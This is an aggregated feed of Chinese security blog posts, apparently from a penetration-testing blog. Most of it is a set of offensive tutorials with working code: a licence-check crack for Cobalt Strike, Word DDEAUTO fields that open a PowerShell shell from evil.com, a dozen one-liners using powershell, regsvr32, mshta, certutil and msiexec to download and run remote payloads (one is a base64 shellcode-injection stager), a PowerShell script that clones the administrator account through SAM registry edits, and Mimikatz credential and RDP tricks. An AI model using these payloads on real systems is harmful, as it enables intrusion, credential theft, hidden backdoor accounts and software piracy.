Embed this content in your HTML

Search

Edit this Super RSS.
Account: (login)

More Channels


Channel Catalog


Channel Description:

all things
    0 0

    说 OAuth2.0 漏洞/这个协议不安全的人,把头伸过来下,砖头准备好了。 Black Hat 的有关 Pa […]

    0 0
  • 11/08/16--00:28: 记第10次印刷 (chan 69772724)
  • 《Web前端黑客技术揭秘》这本书2013.1月开售至今,已经第10次印刷,在安全类书籍中,这种成绩确实超出我们 […]

    0 0

    Seebug Paper之前收录了三篇文章有些关联性,分别是: 绕过混合内容警告 – 在安全的页面 […]

    0 0

    当代 Web 的 JSON 劫持技巧 http://paper.seebug.org/130/ 猥琐流的家伙居 […]

    0 0
  • 12/01/16--19:47: [PRE]CSRF攻击-进击的巨人 (chan 69772724)
  • 计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧,除了那些老套的手法之外: https://github. […]

    0 0

    新年新气象,这个蠕虫我做了小范围测试,也提交了官方修复,小圈子里做了分享,这里正式对外公布下,出于研究而非破坏 […]

    0 0
  • 03/05/17--00:37: 蠕虫挖矿一例,无码 (chan 69772724)
  • 今天凌晨,我们的蜜网系统跳出了个有趣的字符串: zaxa2aq@protonmail.com ProtonMa […]

    0 0
  • 05/18/17--19:39: 前端黑在线工具 XSS’OR (chan 69772724)
  • 这是一个在线免费的前端黑工具,目前主要包含 3 大模块: 1. Encode/Decode 加解密模块,包含: […]

    0 0

    XSS’OR 开源了。采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好。在下面 […]

    0 0
  • 09/06/17--22:50: cobaltstrike3.8 破解版 (chan 69772723)
  • C568E2BB-3369-4EB1-993A-EBEA12790162.png
    之前一直想下载3.8,但是没下载到,看到小伙伴留言发了一个试用版的链接(安全性未知)。
    B49E21D6-8C9D-405B-AA10-B0B3B3275F95.png

    链接:https://f001.backblazeb2.com/file/thedarkcloud/cobaltstrike/cobaltstrike-trial.tgz

    然后就下载了一下,发现这个并不是破解版。如下图:
    E0C37677-323F-4D1A-A00D-0CC6068D73A1.png

    所以就对其进行了简单的修改,并把方法分享给大家,以便大家使用。
    首先,对cobaltstrike.jar进行解压,解压以后找到common\License.class,使用jad进行反编译。

    C:\Users\evi1cg\Desktop\jad>jad License.class
    Parsing License.class... Generating License.jad
    

    之后编辑License.jad文件,修改以下参数。找到life,修改为65535L:

    4E7F56F9-72A6-4038-BAD5-778BC8FAF54C.png

    之后将License.jad重命名为License.java,置于解压以后的CobaltStrike的根目录,之后使用javac进行编译。

    javac -classpath . License.java
    

    编译以后得到License.class,使用winrar打开未解压的CobaltStrike,使用修改后的License.class替换原来的License.class即可。

    如果不想打开的时候弹框,可使用以下License.java进行编译

    package common;
    
    import aggressor.Prefs;
    
    public class License
    {
    
        public License()
        {
        }
    
        private static long getTimeSinceStart()
        {
            Prefs prefs = Prefs.getPreferences();
            today = System.currentTimeMillis();
            start = prefs.getLongNumber("cobaltstrike.start.int", 0L);
            if(start == 0L)
            {
                prefs.set("cobaltstrike.start.int", (new StringBuilder()).append("").append(today).append("").toString());
                prefs.save();
                start = today;
            }
            difference = (today - start) / 0x5265c00L;
            return difference;
        }
    
        public static void checkLicenseGUI()
        {
            getTimeSinceStart();
        }
    
        public static boolean isTrial()
        {
            return true;
        }
    
        public static void checkLicenseConsole()
        {
        }
    
        private static long life = 65535L;
        private static long today = 0L;
        private static long start = 0L;
        private static long difference = 0L;
    
    }
    

    在这里有个坑,参照这个文章进行破解是有问题的,他直接修改了common.License.isTrial()的返回值为flase。

    public static boolean isTrial()
      {
        return true;
        // 必须修改函数
        // return false; //edit here
      }
    

    导致在ArtifactUtils类中处理函数XorEncode直接走向payload的Encode。

        public static byte[] XorEncode(byte data[], String arch)
        {
            if(License.isTrial())
            {
                CommonUtils.print_trial((new StringBuilder()).append("Disabled ").append(arch).append(" payload stage encoding.").toString());
                return data;
            }
            AssertUtils.Test(data.length > 16384, "XorEncode used on a stager (or some other small thing)");
            AssertUtils.TestArch(arch);
            if("x86".equals(arch))
            {
                byte decoder[] = CommonUtils.pickOption("resources/xor.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            }
            if("x64".equals(arch))
            {
                byte decoder[] = CommonUtils.readResource("resources/xor64.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            } else
            {
                return new byte[0];
            }
        }
    

    但是由于试用版不存在xor.bin以及xor64.bin,所以会导致无法创建监听。所以我们还是只改时间好了。然后我们的cs就可以使用了,缺点就是不能加密payload。

    5CE4860A-6B52-4E1F-A895-48EBFE03657F.png

    修改版下载链接: 链接: 戳我 密码: 86f3 安全性请自行验证!!


    0 0
  • 10/04/17--00:17: WordPress防火墙 (chan 69772724)
  • 用了很久了,推荐下这个: Wordfence Security 细节自己体验吧,说点别的。 WordPress […]

    0 0
  • 10/10/17--19:59: MSWord Code Exec Without Macro (chan 69772723)
  • 今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。
    首先新建一个word文档,然后插入域:

    1507690693509.png

    选择 = (Formula)

    1507690775534.png

    右键,切换域代码

    1507690814044.png

    代码处修改为:

    {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }
    

    1507690880290.png

    之后,右键更新域,再把文档改成docx格式即可。最终效果如下:

    2.gif

    比较鸡肋的是点是以后才会执行。

    除了使用DDEAUTO,使用DDE也是可以的,具体如下:

    {DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
    

    需要注意的是,使用DDE不会自动执行,需要对文档进行修改,将文档重命名为rar,打开以后修改 word/settings.xml,添加

    <w:updateFields w:val="true"/>
    

    使用DDE效果如下:

    dde.gif

    个人感觉使用DDE效果更好点。

    如何获取交互式shell ?

    { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}
    

    0 0

    经常有小伙伴碰到了命令执行漏洞不会玩,比如mssql注入点的命令执行,怎么来获取一个meterpreter?这个时候,就需要想办法来获取了,关于命令行来执行远程命令的方法碰到很多,但是用的时候老会记不起来,所以在这里把碰到的作为一个总结,没准那种方法能帮到你。(当然,我们这里不说可以直接echo webshell的情形)

    1、powershell

    eg:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    

    2、regsvr32

    eg:

    regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
    

    js.png

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                ps  = "cmd.exe /c calc.exe";
                new ActiveXObject("WScript.Shell").Run(ps,0,true);
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    3、rundll32

    eg:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
    

    细节:看我

    4、mshta

    eg:

    mshta http://site.com/calc.hta
    

    calc.hta

    <HTML>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD>
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
    </script>
    <body>
    demo
    </body>
    </HEAD>
    </HTML>
    

    5、pubprn.vbs

    eg:

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    6、bitsadmin

    eg:

    cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
    

    7、python(需安装)

    eg:

    python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"
    

    abc

    import base64; exec base64.b64decode("aW1wb3J0IGN0eXBlcwppbXBvcnQgcGxhdGZvcm0KCihhcmNoLCB0eXBlKSA9IHBsYXRmb3JtLmFyY2hpdGVjdHVyZSgpCgojIDMyLWJpdCBQeXRob24KaWYgYXJjaCA9PSAiMzJiaXQiOgoJc2hlbGxjb2RlID0gIlx4ZmNceGU4XHg4OVx4MDBceDAwXHgwMFx4NjBceDg5XHhlNVx4MzFceGQyXHg2NFx4OGJceDUyXHgzMFx4OGJceDUyXHgwY1x4OGJceDUyXHgxNFx4OGJceDcyXHgyOFx4MGZceGI3XHg0YVx4MjZceDMxXHhmZlx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4YzFceGNmXHgwZFx4MDFceGM3XHhlMlx4ZjBceDUyXHg1N1x4OGJceDUyXHgxMFx4OGJceDQyXHgzY1x4MDFceGQwXHg4Ylx4NDBceDc4XHg4NVx4YzBceDc0XHg0YVx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4OGJceDU4XHgyMFx4MDFceGQzXHhlM1x4M2NceDQ5XHg4Ylx4MzRceDhiXHgwMVx4ZDZceDMxXHhmZlx4MzFceGMwXHhhY1x4YzFceGNmXHgwZFx4MDFceGM3XHgzOFx4ZTBceDc1XHhmNFx4MDNceDdkXHhmOFx4M2JceDdkXHgyNFx4NzVceGUyXHg1OFx4OGJceDU4XHgyNFx4MDFceGQzXHg2Nlx4OGJceDBjXHg0Ylx4OGJceDU4XHgxY1x4MDFceGQzXHg4Ylx4MDRceDhiXHgwMVx4ZDBceDg5XHg0NFx4MjRceDI0XHg1Ylx4NWJceDYxXHg1OVx4NWFceDUxXHhmZlx4ZTBceDU4XHg1Zlx4NWFceDhiXHgxMlx4ZWJceDg2XHg1ZFx4NjhceDZlXHg2NVx4NzRceDAwXHg2OFx4NzdceDY5XHg2ZVx4NjlceDU0XHg2OFx4NGNceDc3XHgyNlx4MDdceGZmXHhkNVx4ZThceDgwXHgwMFx4MDBceDAwXHg0ZFx4NmZceDdhXHg2OVx4NmNceDZjXHg2MVx4MmZceDM1XHgyZVx4MzBceDIwXHgyOFx4NjNceDZmXHg2ZFx4NzBceDYxXHg3NFx4NjlceDYyXHg2Y1x4NjVceDNiXHgyMFx4NGRceDUzXHg0OVx4NDVceDIwXHgzOVx4MmVceDMwXHgzYlx4MjBceDU3XHg2OVx4NmVceDY0XHg2Zlx4NzdceDczXHgyMFx4NGVceDU0XHgyMFx4MzZceDJlXHgzMVx4M2JceDIwXHg1N1x4NGZceDU3XHgzNlx4MzRceDNiXHgyMFx4NTRceDcyXHg2OVx4NjRceDY1XHg2ZVx4NzRceDJmXHgzNVx4MmVceDMwXHgzYlx4MjBceDQyXHg0Zlx4NDlceDQ1XHgzOVx4M2JceDQ1XHg0ZVx4NTVceDUzXHg0ZFx4NTNceDQ1XHgyOVx4MDBceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4MDBceDU5XHgzMVx4ZmZceDU3XHg1N1x4NTdceDU3XHg1MVx4NjhceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGViXHg3OVx4NWJceDMxXHhjOVx4NTFceDUxXHg2YVx4MDNceDUxXHg1MVx4NjhceGI4XHgyMlx4MDBceDAwXHg1M1x4NTBceDY4XHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NjJceDU5XHgzMVx4ZDJceDUyXHg2OFx4MDBceDAyXHg2MFx4ODRceDUyXHg1Mlx4NTJceDUxXHg1Mlx4NTBceDY4XHhlYlx4NTVceDJlXHgzYlx4ZmZceGQ1XHg4OVx4YzZceDMxXHhmZlx4NTdceDU3XHg1N1x4NTdceDU2XHg2OFx4MmRceDA2XHgxOFx4N2JceGZmXHhkNVx4ODVceGMwXHg3NFx4NDRceDMxXHhmZlx4ODVceGY2XHg3NFx4MDRceDg5XHhmOVx4ZWJceDA5XHg2OFx4YWFceGM1XHhlMlx4NWRceGZmXHhkNVx4ODlceGMxXHg2OFx4NDVceDIxXHg1ZVx4MzFceGZmXHhkNVx4MzFceGZmXHg1N1x4NmFceDA3XHg1MVx4NTZceDUwXHg2OFx4YjdceDU3XHhlMFx4MGJceGZmXHhkNVx4YmZceDAwXHgyZlx4MDBceDAwXHgzOVx4YzdceDc0XHhiY1x4MzFceGZmXHhlYlx4MTVceGViXHg0OVx4ZThceDk5XHhmZlx4ZmZceGZmXHgyZlx4NTJceDYyXHg0Nlx4NjJceDAwXHgwMFx4NjhceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDZhXHg0MFx4NjhceDAwXHgxMFx4MDBceDAwXHg2OFx4MDBceDAwXHg0MFx4MDBceDU3XHg2OFx4NThceGE0XHg1M1x4ZTVceGZmXHhkNVx4OTNceDUzXHg1M1x4ODlceGU3XHg1N1x4NjhceDAwXHgyMFx4MDBceDAwXHg1M1x4NTZceDY4XHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg4NVx4YzBceDc0XHhjZFx4OGJceDA3XHgwMVx4YzNceDg1XHhjMFx4NzVceGU1XHg1OFx4YzNceGU4XHgzN1x4ZmZceGZmXHhmZlx4MzFceDMwXHgzM1x4MmVceDMyXHgzM1x4MzhceDJlXHgzMlx4MzJceDM1XHgyZVx4MzFceDMyXHgzOVx4MDAiCgojIDY0LWJpdCBQeXRob24KZWxpZiBhcmNoID09ICI2NGJpdCI6CglzaGVsbGNvZGUgPSAiXHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjOFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDY2XHg4MVx4NzhceDE4XHgwYlx4MDJceDc1XHg3Mlx4OGJceDgwXHg4OFx4MDBceDAwXHgwMFx4NDhceDg1XHhjMFx4NzRceDY3XHg0OFx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4NDRceDhiXHg0MFx4MjBceDQ5XHgwMVx4ZDBceGUzXHg1Nlx4NDhceGZmXHhjOVx4NDFceDhiXHgzNFx4ODhceDQ4XHgwMVx4ZDZceDRkXHgzMVx4YzlceDQ4XHgzMVx4YzBceGFjXHg0MVx4YzFceGM5XHgwZFx4NDFceDAxXHhjMVx4MzhceGUwXHg3NVx4ZjFceDRjXHgwM1x4NGNceDI0XHgwOFx4NDVceDM5XHhkMVx4NzVceGQ4XHg1OFx4NDRceDhiXHg0MFx4MjRceDQ5XHgwMVx4ZDBceDY2XHg0MVx4OGJceDBjXHg0OFx4NDRceDhiXHg0MFx4MWNceDQ5XHgwMVx4ZDBceDQxXHg4Ylx4MDRceDg4XHg0OFx4MDFceGQwXHg0MVx4NThceDQxXHg1OFx4NWVceDU5XHg1YVx4NDFceDU4XHg0MVx4NTlceDQxXHg1YVx4NDhceDgzXHhlY1x4MjBceDQxXHg1Mlx4ZmZceGUwXHg1OFx4NDFceDU5XHg1YVx4NDhceDhiXHgxMlx4ZTlceDRmXHhmZlx4ZmZceGZmXHg1ZFx4NmFceDAwXHg0OVx4YmVceDc3XHg2OVx4NmVceDY5XHg2ZVx4NjVceDc0XHgwMFx4NDFceDU2XHg0OVx4ODlceGU2XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceGU4XHg4MFx4MDBceDAwXHgwMFx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNVx4MmVceDMwXHgyMFx4MjhceDYzXHg2Zlx4NmRceDcwXHg2MVx4NzRceDY5XHg2Mlx4NmNceDY1XHgzYlx4MjBceDRkXHg1M1x4NDlceDQ1XHgyMFx4MzlceDJlXHgzMFx4M2JceDIwXHg1N1x4NjlceDZlXHg2NFx4NmZceDc3XHg3M1x4MjBceDRlXHg1NFx4MjBceDM2XHgyZVx4MzFceDNiXHgyMFx4NTdceDRmXHg1N1x4MzZceDM0XHgzYlx4MjBceDU0XHg3Mlx4NjlceDY0XHg2NVx4NmVceDc0XHgyZlx4MzVceDJlXHgzMFx4M2JceDIwXHg0Mlx4NGZceDQ5XHg0NVx4MzlceDNiXHg0NVx4NGVceDU1XHg1M1x4NGRceDUzXHg0NVx4MjlceDAwXHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDAwXHg1OVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NDFceDUwXHg0MVx4NTBceDQxXHhiYVx4M2FceDU2XHg3OVx4YTdceGZmXHhkNVx4ZWJceDYxXHg1YVx4NDhceDg5XHhjMVx4NDFceGI4XHhiOFx4MjJceDAwXHgwMFx4NGRceDMxXHhjOVx4NDFceDUxXHg0MVx4NTFceDZhXHgwM1x4NDFceDUxXHg0MVx4YmFceDU3XHg4OVx4OWZceGM2XHhmZlx4ZDVceGViXHg0NFx4NDhceDg5XHhjMVx4NDhceDMxXHhkMlx4NDFceDU4XHg0ZFx4MzFceGM5XHg1Mlx4NjhceDAwXHgwMlx4NjBceDg0XHg1Mlx4NTJceDQxXHhiYVx4ZWJceDU1XHgyZVx4M2JceGZmXHhkNVx4NDhceDg5XHhjNlx4NmFceDBhXHg1Zlx4NDhceDg5XHhmMVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NTJceDUyXHg0MVx4YmFceDJkXHgwNlx4MThceDdiXHhmZlx4ZDVceDg1XHhjMFx4NzVceDFkXHg0OFx4ZmZceGNmXHg3NFx4MTBceGViXHhkZlx4ZWJceDYzXHhlOFx4YjdceGZmXHhmZlx4ZmZceDJmXHg2Ylx4NTRceDQ4XHg1Nlx4MDBceDAwXHg0MVx4YmVceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDQ4XHgzMVx4YzlceGJhXHgwMFx4MDBceDQwXHgwMFx4NDFceGI4XHgwMFx4MTBceDAwXHgwMFx4NDFceGI5XHg0MFx4MDBceDAwXHgwMFx4NDFceGJhXHg1OFx4YTRceDUzXHhlNVx4ZmZceGQ1XHg0OFx4OTNceDUzXHg1M1x4NDhceDg5XHhlN1x4NDhceDg5XHhmMVx4NDhceDg5XHhkYVx4NDFceGI4XHgwMFx4MjBceDAwXHgwMFx4NDlceDg5XHhmOVx4NDFceGJhXHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg0OFx4ODNceGM0XHgyMFx4ODVceGMwXHg3NFx4YjZceDY2XHg4Ylx4MDdceDQ4XHgwMVx4YzNceDg1XHhjMFx4NzVceGQ3XHg1OFx4NThceGMzXHhlOFx4MzVceGZmXHhmZlx4ZmZceDMxXHgzMFx4MzNceDJlXHgzMlx4MzNceDM4XHgyZVx4MzJceDMyXHgzNVx4MmVceDMxXHgzMlx4MzlceDAwIiAKZWxzZToKCXNoZWxsY29kZSA9ICIiCgojIHNhbml0eSBjaGVjayBvdXIgc2l0dWF0aW9uCmlmIHR5cGUgIT0gIldpbmRvd3NQRSIgb3IgbGVuKHNoZWxsY29kZSkgPT0gMDoKCXF1aXQoKQoKIyBpbmplY3Qgb3VyIHNoZWxsY29kZQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEpCg==")
    

    8、certutil

    eg:

    certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    9、msiexec

    msiexec /q /i http://site.com/payloads/calc.png
    

    calc.png

    msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
    

    10、msxsl.exe(需下载)

    eg:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
    
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    11、IEExec

    eg:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe
    

    细节:戳我

    12、IEXPLORE.EXE

    这个需要IE存在可执行命令的漏洞
    eg:

    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp
    

    exp可以使用类似ms14_064

    方式应该还有很多,欢迎留言补充!!


    0 0

    最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题:
    1.jpg

    ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,才能记录到明文密码。

    后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的,为了方便,整理了一个powershell脚本,脚本可以自动修改注册表键值权限(需要用administrator权限运行,及bypassuac以后的权限),之后在进行操作。具体代码如下:

    function Create-Clone
    {
    <#
    .SYNOPSIS
    This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
    .PARAMETER u
    The clone username
    .PARAMETER p
    The clone user's password
    .PARAMETER cu
    The user to clone, default administrator
    .EXAMPLE
    Create-Clone -u evi1cg -p evi1cg123 -cu administrator
    #>
        Param(
            [Parameter(Mandatory=$true)]
            [String]
            $u,
    
            [Parameter(Mandatory=$true)]
            [String]
            $p,
    
            [Parameter(Mandatory=$false)]
            [String]
            $cu = "administrator"
        )
        function upReg{
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] >> $env:temp\up.ini"
            cmd /c "regini $env:temp\up.ini"
            Remove-Item $env:temp\up.ini
    
        }
        function downreg {
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17] >> $env:temp\down.ini"
            cmd /c "regini $env:temp\down.ini"
            Remove-Item $env:temp\down.ini
        }
        function Create-user ([string]$Username,[string]$Password) {
            $group = "Administrators"
            $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
            if (!$existing) {
                Write-Host "[*] Creating new local user $Username with password $Password"
                & NET USER $Username $Password /add /y /expires:never | Out-Null
                Write-Host "[*] Adding local user $Username to $group."
                & NET LOCALGROUP $group $Username /add | Out-Null
    
            }
            else {
                $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
                $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
                Write-Host "[*] Setting password for existing local user $Username"
                $exist.SetPassword($Password)
            }
    
            Write-Host "[*] Ensuring password for $Username never expires."
            & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null
        }
        function GetUser-Key([string]$user)
        {
            if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
                cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
                $file = Get-Content "$env:temp\$user.reg"  | Out-String
                $pattern="@=hex\((.*?)\)\:"
                $file -match $pattern |Out-Null
                $key = "00000"+$matches[1]
                Write-Host "[!]"$key
                return $key
            }else {
                Write-Host "[-] SomeThing Wrong !"
            }
    
        }
        function Clone ([string]$ukey,[string]$cukey) {
            $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
            $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
            Write-Host "[*] Get clone user'F value"
            $cuFreg = Get-Item -Path $cureg.Trim()
            $cuFvalue = $cuFreg.GetValue('F')
            Write-Host "[*] Change user'F value"
            Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
            $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
            cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
        }
        function Main () {
            Write-Output "[*] Start"
            Write-Output "[*] Tring to change reg privilege !"
            upReg
            if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
                Write-Host "[-] The User to Clone does not exist"
                Write-Output "[*] Change reg privilege back !"
                downReg
                Write-Output "[*] Exiting !"
            }
            else {
                if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
                    $tmp = "1"
                }
                else{
                    $tmp = "0"
                }
                Write-Output "[*] Create User..."
                Create-user $u $p
                Write-Output "[*] Get User $u's  Key .."
                $ukey = GetUser-Key $u |Out-String
                Write-Output "[*] Get User $cu's  Key .."
                $cukey = GetUser-Key $cu |Out-String
                Write-Output "[*] Clone User.."
                Clone $ukey $cukey
                if($tmp -eq 1 ){
                    Write-Output "[*] Delete User.."
                    cmd /c "net User $u /del " |Out-Null
                }else{ Write-Output "[*] Don't need to delete.."}
                cmd /c "regedit /s $env:temp\$u.reg"
                cmd /c "regedit /s $env:temp\out.reg"
                Remove-Item $env:temp\*.reg
                Write-Output "[*] Change reg privilege back !"
                downreg
                Write-Output "[*] Done"
            }
        }
        Main
    }
    

    GITHUB:

    新建账号以后,可成功登陆系统

    2.jpg

    在Win7上做的测试如下:

    demo

    当然可以配合这个姿势来实现多用户登陆。

    使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

    ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改


    0 0
  • 11/20/17--21:32: CVE-2017-11882利用 (chan 69772723)
  • 最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)

    今天在twitter上看到有人共享了一个POC,twitter地址poc地址,后来又看到有人共享了一个项目CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,使用起来可能并不容易,所以就对此文件进行了简单的修改,具体项目地址如下:GITHUB:
